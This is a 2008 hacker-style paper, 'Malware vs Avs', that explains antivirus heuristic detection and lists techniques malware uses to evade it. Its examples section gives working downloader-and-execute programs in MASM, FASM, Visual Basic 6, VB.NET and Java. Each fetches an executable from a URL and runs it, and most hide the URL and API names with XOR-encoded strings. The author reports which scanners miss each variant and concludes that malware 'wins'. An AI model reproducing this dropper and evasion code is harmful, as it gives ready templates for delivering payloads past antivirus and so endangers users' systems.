File: /home/juza/Desktop/Malware vs Avs v1 Page 1 of 13

___
/\\,/\\, ,, - -_,
/| || || _ ||; _ ; ( ~/|| ;
|| || || < \,||\\/\/\ < \,,._-__-_ \\/\ _-_,( / || \\/\ _-_,
||=|= || /-|||||| | | /-|| || || \\|| |||_. \/==|| || |||_.
~|| || ||(( |||||| | |(( || || ||/ || | ~ || /_ _|| || | ~ ||
|, \\,\\,\/\\\\\\/\\/ \/\\ \\,\\,/ \\/ , -_- ( - \\,\\/ , -_-
_-

------------------------][Malware vs Avs][---------------------

0x00 - Index
0x10 - Intro
0x20 - Avs
0x30 - Malware
0x40 - Avs Techniques
0x50 - Malware Techniques
0x60 - Examples
0x70 - Conclusion
0x80 - Credits/References

+ ------[ Shell ] -------------------- +

| Juza:/ > ./MalwareVSAvs --Index 0x10 |
| Juza:/ > Redirected to the Intro ... |
+ ------------------------------------ +

In this paper i will explain to you, what is a antivirus software, what is

malware =), and show you what are the tecniques that antivirus software use to
find malware, and of course the techniques that malware use for avoid avs detection.

For the final, i will show you some piratical examples of some basic
malware applications, written in the main programing languages available today (ASM,
C/C++ Visual Basic 6/.NET, JAVA), and see why a antivirus detects our app, or
don't detect it =).

Note: Sorry for the bad English.

+ ------[ Shell ] -------------------- +

| Juza:/ > ./MalwareVSAvs --Index 0x20 |
| Juza:/ > Redirected to Avs ... |
+ ------------------------------------ +

Antivirus, by definition an antivirus is "Antivirus software are computer

programs that attempt to identify, neutralize or eliminate malicious software.".
But in our days, it does a lot more then just "neutralize" and "eliminate",
"malicious software", an antivirus is design to eliminate all kinds of threats,
all kins od malware.
Antivirus software, use sophisticate techniques to identify known malware,
and of course, unknown malware. For this, it identifying suspicious behavior from
any computer program, and the best weapon of antivirus nowadays, is heuristic
analysis, or just heuristic.
This techniques will be analyzed, more in the front of the article.

+ ------[ Shell ] -------------------- +

| Juza:/ > ./MalwareVSAvs --Index 0x30 |
| Juza:/ > Redirected to Malware ... |
+ ------------------------------------ +

Malware, by definition malware is "Malware is all applications, that attempt

to compromise the security of a computer system.". So, malware can be, virus, trojan
horses, rootkits, worms, spyware, backdoors, etc..
Like antivirus, malware use sophisticate techniques to avoid antivirur software
detection, encryption, packing, Entrypoint Obscuring, Anti-Emulation, PolyMorphic
Techniques, hooks, injections, and more.
This techniques will be analysed, more in the front of the article.

+ ------[ Shell ] -------------------- +

| Juza:/ > ./MalwareVSAvs --Index 0x40 |
| Juza:/ > Redirected to Avs Techniques|
File: /home/juza/Desktop/Malware vs Avs v1 Page 2 of 13

+ ------------------------------------ +

There are to main methods to detect malware, generic and specific.

Specific, the antivirus must have some information about the target malware.
Generic, the antivirus detect malware based on malware characteristics.

This generic method, also is called heuristic, heuristic is the technique

that Antivirus software use to detect malware.Heuristic is a tecnology that
permit a antivirus detect malware by signatures, characteristics and emulation,
this can be made by an advanced artificial intelligence.

Heuristic was made because, with the increasing number of malware creations,
according to F-Secure, in 2007 the malware creations exceeded all malware creations
of 20 years behind, all together. In 1995, malware was taking the control over
antivirus software. Antivirus companies react with heuristic technology.

The most advanced heuristic engines use:

- variable/memory emulator;
- parser;
- flow analyzer;
- code analyzer;
- disassembler/emulator;
- weight-based system and/or rule based system.

There are two types of scanning, signature scaning and heuristic scaning.

Signature scanning, this type of scanning searches for certain sequence of bytes,
that exists in common malware, like "*.exe", windows apis, and others.

Heuristic scanning, this type of scanning is a lot more advanced them the last one,
heuristic scanning searches for instructions or commands within a program that are not
found in typical applications.

There are some characteristics that can make malware detected by antivirus,
and this characteristics are:

[Characteristics]

-Executable
- Incorrect timestamp;

- Entrypoint
- Entrypoint location, if the entrypoint isn't in the frist section;

- Size of the executable

- Executable is less then 2kb;

- PE HEADER Data
- PE Header Location;
- Incorrect SizeOfImage;
- Incorrect SizeOfCode;
- PE Header incorrect parameters;

- Sections characteristics
- If the last section is exectubale;
- If the frist section is writable;

- Number of sections
- Executable have only one section;

- Section Names
- Unknown section name;
- Empty section name;

- Code
- Different from the standards, of the language;
- Code Redirections;
- Long Loops/Jumps;
File: /home/juza/Desktop/Malware vs Avs v1 Page 3 of 13

- Usage of PEB to gain system dlls Image Base;

- Suspicious Strings
- "*.exe";
- "CreateRemoteThread";
- etc;

- etc...

[Emulation]

- Suspicious file access;

- Relocator;
- Suspicious Memory Allocation;
- Contains a routine to search for executable (.COM or .EXE) files;
- Found an instruction decryption routine;
- Flexible Entry-point;
- The program traps the loading of software;
- Disk write access;
- Access/Creation of files in critical folders;
- Memory resident code;
- Invalid opcode (non-8088 instructions) or out-of-range branch;
- Suspicious jump construct;
- Inconsistent exe-header;
- Garbage instructions;
- Undocumented interrupt/DOS call;
- EXE/COM determination;
- Overwrite/move a program in memory;
- Re-start the application after modifications;
- Unusual stack;
- Incorrect executable tree;
- etc...

Each one of these characteristics has one determined weight, the set of the addition
of all the weights, will indicate if is a malware, or not.

In short the heuristic is a very powerful technology, but it have some imperfections,
heuristic can make False Positives, example, a program who was design to format hard disk,
defrag disks, etc..., some antivirus will tell that this program is malware, or it's infected.

To prevent this happen, antivirus can recognize, legal applications.

+ ------[ Shell ] -------------------- +

| Juza:/ > ./MalwareVSAvs --Index 0x50 |
| Juza:/ > Redirected to Malware Tech. |
+ ------------------------------------ +

Now, after all this, how can malware bypass all this system called heuristic. Nowadays
malware also use advanced techniques to avoid detection by antivirus, and this Techniques are:

- Sections characteristics not alterated;

- Add know section names;
- Ofuscation;
- Entrypoint obscuring;
- Stack patches;
- Update Checksums;
- Update timestamp;
- Correct PE HEADER;
- SEH;
- Use MMX, SSE Tecnology;
- Anti-Sandbox;
- Anti-Debug;
- Anti-Virtualization;
- Api redirect;
- Api hook (Layer 0/3);
- Descrypt code with brute force;
- Use Threads or double threads (Multi-Multi Thread Engine =));
- No Strings;
- etc...
File: /home/juza/Desktop/Malware vs Avs v1 Page 4 of 13

These are the main techniques to avoid heuristic emulation. Just Remember, you application
must be like some other normal application.

+ ------[ Shell ] -------------------- +

| Juza:/ > ./MalwareVSAvs --Index 0x60 |
| Juza:/ > Redirected to Examples ... |
+ ------------------------------------ +

In this section we will build some basic programs, only for test the reactions of avs,
first of all, we will create a simple program to show a messagebox and exit, just for see the
reactions.

I will use virustotal for make the tests.

MASM.

.386
.model flat, stdcall

option casemap:none

include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib

.data
_szMessage db "Juza", 0h
_szText db "The Puppet Master", 0h
.code
start:

push 0
push offset _szMessage
push offset _szText
push 0
call MessageBoxA

push 0
call ExitProcess
end start

Result : hxxp://www.virustotal.com/pt/analisis/1a00...31746fc0e0f1057

One Av Prevx1, tells me that the code above is a Cloaked Malware, ummmm, very interesting, lol.

Let's try now with FASM.

format PE GUI 4.0

entry start

include 'win32a.inc'

section '.data' data readable writeable

_caption db 'The Puppet Master',0
_message db 'Juza',0

section '.code' code readable executable

start:

push MB_OK
push _caption
push _message
push NULL
call [MessageBox]
File: /home/juza/Desktop/Malware vs Avs v1 Page 5 of 13

push 0
call [ExitProcess]

section '.idata' import data readable writeable

library user,'USER32.dll',\
kernel, 'KERNEL32.DLL'

import user,\
MessageBox,'MessageBoxA'

import kernel,\
ExitProcess, 'ExitProcess'

Result: hxxp://www.virustotal.com/pt/analisis/83b9...e57f99cdade57db

And now the most interesting think, 5 avs detects a a potential virus, and just for
a simple messagebox.

Now let's test with C/C++.

#include <windows.h>

#ifndef null
#define null 0
#endif

int main (int argc, char **argv) {

MessageBox(null, "Juza", "Juza", null);
return 0;
}

Result: hxxp://www.virustotal.com/pt/analisis/fbfd...c15fdeef60c2fd5

Ummm, nothing, thats good, for what we saw previously.

Now with Visual Basic 6.

Private Declare Function MessageBox _

Lib "user32" Alias "MessageBoxA" _
(ByVal hwnd As Long, ByVal lpText As String, _
ByVal lpCaption As String, ByVal wType As Long) As Long

Private Sub Form_Load()

MessageBox &H0, "Juza", "Juza The Puppet Master", &H0
unload me
End Sub

Result: hxxp://www.virustotal.com/pt/analisis/0f76...40ab9d00c52d28c

Another surprising detection, panda tells me that is a "Suspicious file" =).

Now let's try VB.NET.

Public Class Form1

Private Sub Form1_Load( _

ByVal sender As System.Object, _
File: /home/juza/Desktop/Malware vs Avs v1 Page 6 of 13

ByVal e As System.EventArgs) _
Handles MyBase.Load
MessageBox.Show("Juza", "Juza", MessageBoxButtons.OK)
End Sub
End Class

Result: hxxp://www.virustotal.com/pt/analisis/6c13...b75f1970099c5b5

Nothing.

Now for the final test, we will use JAVA.

import javax.swing.JApplet;
import javax.swing.JFrame;
import javax.swing.JOptionPane;

public class mg extends JApplet {

static JFrame frame = new JFrame("My Window");

public static void main(String[] args) {

JOptionPane.showMessageDialog(frame, "Juza The Puppet Naster");
}
}

Result: hxxp://www.virustotal.com/analisis/f418982...016d9f5f9d1b6df

As i think, nothing.

With this results, we can make a simple conclusion, the majority of all avs, have more
easiness, to detect something strange on native win32 applications, the same avs that detect, something
strange on the ASM messagebox (MASM,FASM), don't detect nothing on the framework based languages,
VB.NET and JAVA, so we can conclude for now, that avs have difficulty on emulation of JAVA and .NET
based applications.

Now i will finish the tests, with something simple, but is something that every malware coder
programmed before, i will test the avs with a simple Downloader, just for see the reactions.

In the case of non-framework based applications, we will have just one Api, the rest will be
loaded, and a simple encrypt function, to prevent signature scan.

The file we will download is putty, located in :

hxxp://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

MASM.

.386
.model flat, stdcall

option casemap:none

include kernel32.inc
include shell32.inc
includelib kernel32.lib
includelib shell32.lib

.data
;http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
_szDownload db ".226|ii2.#h#'42.h*/i85!2'2.'+i6322?i*'2#52i>~pi6322?h#>#", 0h;70
_szDll db "Afxy{z:pxx", 0h;20
_szFunc db "}zdlG_FDGIL|GnADMi", 0h;40
_szSp db "a8^rwvv{,gzg", 0h;2

_dwHDll dd 0h
File: /home/juza/Desktop/Malware vs Avs v1 Page 7 of 13

_dwHFunc dd 0h

.code

start:

mov eax, offset _szDll

@@:
cmp byte ptr [eax], 0h
je @F
xor byte ptr [eax], 20
add eax, 1
jmp @B
@@:

push offset _szDll

call LoadLibrary

mov _dwHDll, eax

mov eax, offset _szFunc

@@:
cmp byte ptr [eax], 0h
je @F
xor byte ptr [eax], 40
add eax, 1
jmp @B
@@:

push offset _szFunc

push dword ptr [_dwHDll]
call GetProcAddress

mov _dwHFunc, eax

mov eax, offset _szDownload

@@:
cmp byte ptr [eax], 0h
je @F
xor byte ptr [eax], 70
add eax, 1
jmp @B
@@:

mov eax, offset _szSp

@@:
cmp byte ptr [eax], 0h
je @F
xor byte ptr [eax], 2
add eax, 1
jmp @B
@@:

mov eax, dword ptr _dwHFunc

push 0h
push 0h
push offset _szSp
push offset _szDownload
push 0h
call eax

push 5;SW_SHOW
push 0
File: /home/juza/Desktop/Malware vs Avs v1 Page 8 of 13

push 0
push offset _szSp
push 0
push 0
call ShellExecute

push 0
call ExitProcess

end start

Result: hxxp://www.virustotal.com/pt/analisis/b1f2...a734d9f65375736

Umm, this a result that i not expected, just 4 avs, and the best ones don't detect
(Kaspersky, Nod32).

Let's try with FASM.

format PE GUI 4.0

entry start

include 'win32a.inc'

section '.data' data readable writeable

_szDownload db ".226|ii2.#h#'42.h*/i85!2'2.'+i6322?i*'2#52i>~pi6322?h#>#", 0h;70
_szDll db "Afxy{z:pxx", 0h;20
_szFunc db "}zdlG_FDGIL|GnADMi", 0h;40
_szSp db "a8^rwvv{,gzg", 0h;2

_dwHDll dd 0h
_dwHFunc dd 0h

section '.code' code readable executable

start:

mov eax, _szDll

@@:
cmp byte [eax], 0h
je @F
xor byte [eax], 20
add eax, 1
jmp @B
@@:

push _szDll
call [LoadLibrary]

mov [_dwHFunc], eax

mov eax, _szFunc

@@:
cmp byte [eax], 0h
je @F
xor byte [eax], 40
add eax, 1
jmp @B
@@:

push _szFunc
push [_dwHFunc]
call [GetProcAddress]

mov [_dwHFunc], eax

File: /home/juza/Desktop/Malware vs Avs v1 Page 9 of 13

mov eax, _szDownload

@@:
cmp byte [eax], 0h
je @F
xor byte [eax], 70
add eax, 1
jmp @B
@@:

mov eax, _szSp

@@:
cmp byte [eax], 0h
je @F
xor byte [eax], 2
add eax, 1
jmp @B
@@:

mov eax, [_dwHFunc]

push 0h
push 0h
push _szSp
push _szDownload
push 0h
call eax

push 5;SW_SHOW
push 0
push 0
push _szSp
push 0
push 0
call [ShellExecute]

push 0
call [ExitProcess]

section '.idata' import data readable writeable

library shell,'SHELL32.DLL',\
kernel, 'KERNEL32.DLL'

import kernel,\
GetProcAddress, 'GetProcAddress',\
LoadLibrary, 'LoadLibraryA',\
ExitProcess, 'ExitProcess'

import shell,\
ShellExecute, 'ShellExecuteA'

Result: hxxp://www.virustotal.com/pt/analisis/44d2...9f51e1b46fb916a

7 avs, detect it, not bad.

Now with Visual Basic 6.

Private Declare Function URLDownloadToFile Lib "urlmon.dll" _

Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long _
) As Long

Private Sub Form_Load()

URLDownloadToFile &H0, decript(".226|ii2.#h#'42.h*/i85!2'2.'+i6322?i*'2#52i>~pi6322?
File: /home/juza/Desktop/Malware vs Avs v1 Page 10 of 13

h#>#", 70), _
decript("a8^rwvv{,gzg", 2), &H0, &H0

Shell decript("a8^rwvv{,gzg", 2)

Unload me
End Sub

Private Function decript(ByVal szStr As String, ByVal intVal As Integer) As String

Dim i, a As Integer
Dim szChar As String
Dim szDump As String

For i = 1 To Len(szStr)
szChar = Mid(szStr, i, 1)
a = intVal Xor Asc(szChar)
szChar = Chr(a)
szDump = szDump & szChar
Next i

decript = szDump
End Function
</font><font face="Courier New">

Result: hxxp://www.virustotal.com/pt/analisis/9f89a47f99d0e8c70320cd6335267d86

They detect this, by signature "URLDownloadToFileA".

Visual Basic.Net

Imports System.IO
Imports System.Net
Imports System.Text

Public Class Form1

Private Sub Form1_Load( _

ByVal sender As System.Object, ByVal e As System.EventArgs) _
Handles MyBase.Load

Dim wr As HttpWebRequest = CType(WebRequest.Create(decript(".226|ii2.#h#'42.h*/i85!

2'2.'+i6322?i*'2#52i>~pi6322?h#>#", 70)), HttpWebRequest)
Dim ws As HttpWebResponse = CType(wr.GetResponse(), HttpWebResponse)
Dim str As Stream = ws.GetResponseStream()
Dim inBuf(100000) As Byte
Dim bytesToRead As Integer = CInt(inBuf.Length)
Dim bytesRead As Integer = 0

While bytesToRead > 0

Dim n As Integer = str.Read(inBuf, bytesRead, bytesToRead)
If n = 0 Then
Exit While
End If
bytesRead += n
bytesToRead -= n
End While
Dim fstr As New FileStream(decript("a8^rwvv{,gzg", 2), FileMode.OpenOrCreate,
FileAccess.Write)
fstr.Write(inBuf, 0, bytesRead)
str.Close()
fstr.Close()

Shell(decript("a8^rwvv{,gzg", 2))
Me.Close()

End Sub
File: /home/juza/Desktop/Malware vs Avs v1 Page 11 of 13

Private Function decript(ByVal szStr As String, ByVal intVal As Integer) As String

Dim i, a As Integer
Dim szChar As String
Dim szDump As String = vbNullString

For i = 1 To Len(szStr)
szChar = Mid(szStr, i, 1)
a = intVal Xor Asc(szChar)
szChar = Chr(a)
szDump = szDump & szChar
Next i

decript = szDump
End Function

End Class

Result: hxxp://www.virustotal.com/pt/analisis/e5e3ab6de021d6d81570ce71f0539569

Haha, Avs don't like frameworks =).

JAVA

import java.io.*;
import java.net.*;
import java.util.concurrent.Executor;

public class FileDownload {

public static void download(String address, String localFileName) {
OutputStream out = null;
URLConnection conn = null;
InputStream in = null;
try {
URL url = new URL(address);
out = new BufferedOutputStream(
new FileOutputStream(localFileName));
conn = url.openConnection();
in = conn.getInputStream();
byte[] buffer = new byte[1024];
int numRead;
long numWritten = 0;
while ((numRead = in.read(buffer)) != -1) {
out.write(buffer, 0, numRead);
numWritten += numRead;
}
System.out.println(localFileName + "\t" + numWritten);
} catch (Exception exception) {
exception.printStackTrace();
} finally {
try {
if (in != null) {
in.close();
}
if (out != null) {
out.close();
}
} catch (IOException ioe) {
}
}
}

public static void download(String address) {

int lastSlashIndex = address.lastIndexOf('/');
if (lastSlashIndex >= 0 &&
lastSlashIndex < address.length() - 1) {
download(address, address.substring(lastSlashIndex + 1));
File: /home/juza/Desktop/Malware vs Avs v1 Page 12 of 13

} else {
System.err.println("Could not figure out local file name
for " +
address);
}
}

public static void main(String[] args) throws IOException {

String command = "wine putty.exe";
download("http://the.earth.li/~sgtatham/putty/latest/x86/
putty.exe");
Process child = Runtime.getRuntime().exec(command);
}
}

Result: hxxp://www.virustotal.com/analisis/a7cb0fb...4d620aebd4e11bd

Nothing, as i expect.

+ ------[ Shell ] -------------------- +

| Juza:/ > ./MalwareVSAvs --Index 0x70 |
| Juza:/ > Redirected to Conclusion .. |
+ ------------------------------------ +

Frist of all, Sorry for i don't complete the code, but i have alot of
work, if i win, i will finish it lol =), just kiding.

Ok, conclusion, with this we can conclude that:

- The majority of avs don't have heuristic so developed.

- We can easily bypass it.
- Applications that are based on frameworks, aren't detected. =)

The more similarities your malware have to a normal application, will be the key to avoid
antivirus detection, making avs think that is a normal application.

Know your enemy, and you will be always victurious.

.. and the winner is, malware of course. =)

+ ------[ Shell ] -------------------- +

| Juza:/ > ./MalwareVSAvs --Index 0x80 |
| Juza:/ > Redirected to Cred/Ref ... |
+ ------------------------------------ +

[References]

[1] Peering Inside the PE: A Tour of the Win32 Portable Executable File Format
- hxxp://msdn.microsoft.com/en-us/magazine/ms809762.aspx

[2] Heuristic Anti-Virus Technology by Frans Veldman

- hxxp://mirror.sweon.net/madchat/vxdevl/vdat/epheurs1.htm

[3] Anti heuristic techniques

- hxxp://vx.netlux.org/lib/vbj01.html

[4] A guide to Anti-Heuristics / Shmistics Technology

- hxxp://vx.netlux.org/lib/vkh01.html

[5] .NET/MSIL Malicious Code and AV/Heuristic Engines

- hxxp://www.securityfocus.com/infocus/1642

[6] Heuristic analysis

- hxxp://en.wikipedia.org/wiki/Heuristic_analysis

[7] Heuristic Techniques in AV Solutions: An Overview

File: /home/juza/Desktop/Malware vs Avs v1 Page 13 of 13

- hxxp://www.securityfocus.com/infocus/1542

[8] Fighting EPO Viruses

- hxxp://www.securityfocus.com/infocus/1841

[9] Juza
- Brain

[Credits]

Frans Veldman, Markus Schmall, Marco Schmidt, ...

By Juza The Puppet Master,

Sun Jul 13 2008